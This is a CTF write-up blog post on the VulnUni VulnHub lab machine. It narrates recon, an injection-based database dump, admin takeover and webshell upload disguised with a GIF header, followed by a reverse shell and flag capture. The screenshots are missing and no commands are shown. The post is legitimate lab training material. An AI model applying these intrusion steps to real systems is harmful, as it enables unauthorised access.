niedziela, 7 czerwca 2020

VulnUni CTF

It's been a while since I last time played CTFs from VulnHub so today we'll try something nice and easy - a CTF called VulnUni. Here we go...
Today we'll start here:

 

I started from a 'quick portscan' using nmap:

 

Not much indeed. So I started from the beginning;) Nikto, dirb&go-busters ;) then I started crawling more and more resources and I found 'some kind of a elearning platform':

This was something new for me so I started poking around with the app, searching what I can do as unauthenticated user and so on... and that's how I found:

 

(There are more bugs like this so I decided to find few more.) We will start here:

 

Little confirmation:

 

Part of DB-dump:



 

TL;DR:

 

In the meantime I was googling for the name of the webapp. I found that it's pretty exploitable ;)

 


As far as we already got the password(s) - let's try them:

 

Looks good. What about an admin?

 

Even better! ;) So this is where I started looking for potential upload form to drop a webshell. Let's see what an admin can do:


 

Ups... lack of filtering for 'server settings' (again ;D)...

 

Anyway, playing with the app I found that 'created course' will be stored in the (indexed) directory:


 

So I started my super uploads (everywhere I was able to do ;)):

 

Just checking... ;)

 

Next nice place I was curious about:

 


Interestingly those (uploaded) files (papers, dropbox, documents) are also listed in the index'ed directory, so it was easier now to run a reverse shell from one of them:

 


Oneliner-webshell looks good (but the connection was dropped after very first command send to the target server). So I zipped  the new webshell file and uploaded it again. But this time - for my case - I also added 'GIF98' to my file ;) As we can see below now it's extracted properly:

 

Now we should be here (case for uploaded oneliner):


 

So far, so good. So I grabbed the flag from /home directory:

 

Next - on my Kali VM - I prepared revshell again. This time I used python -m SimpleHTTPServer to download it to remote host:

 

That's how I was able to create a more stable ('reversed') connection:

 

To run - just visit your uploaded file in the course-directory:

 

Little recon ;]

 

Maybe  we'll use it later... So I downloaded few tools to enumerate localhost:

 

I think the best enum-hint from this box comes from uname ;]

 

Few last notes - the flag.txt:

 

I think we can finish this post here. ;]



Special thanks goes to my Patreon: Daniel.
You are AWESOME!




See you next time! ;)

Cheers








Posted by at
Labels: , , ,

Brak komentarzy:

Prześlij komentarz

Subskrybuj: Komentarze do posta (Atom)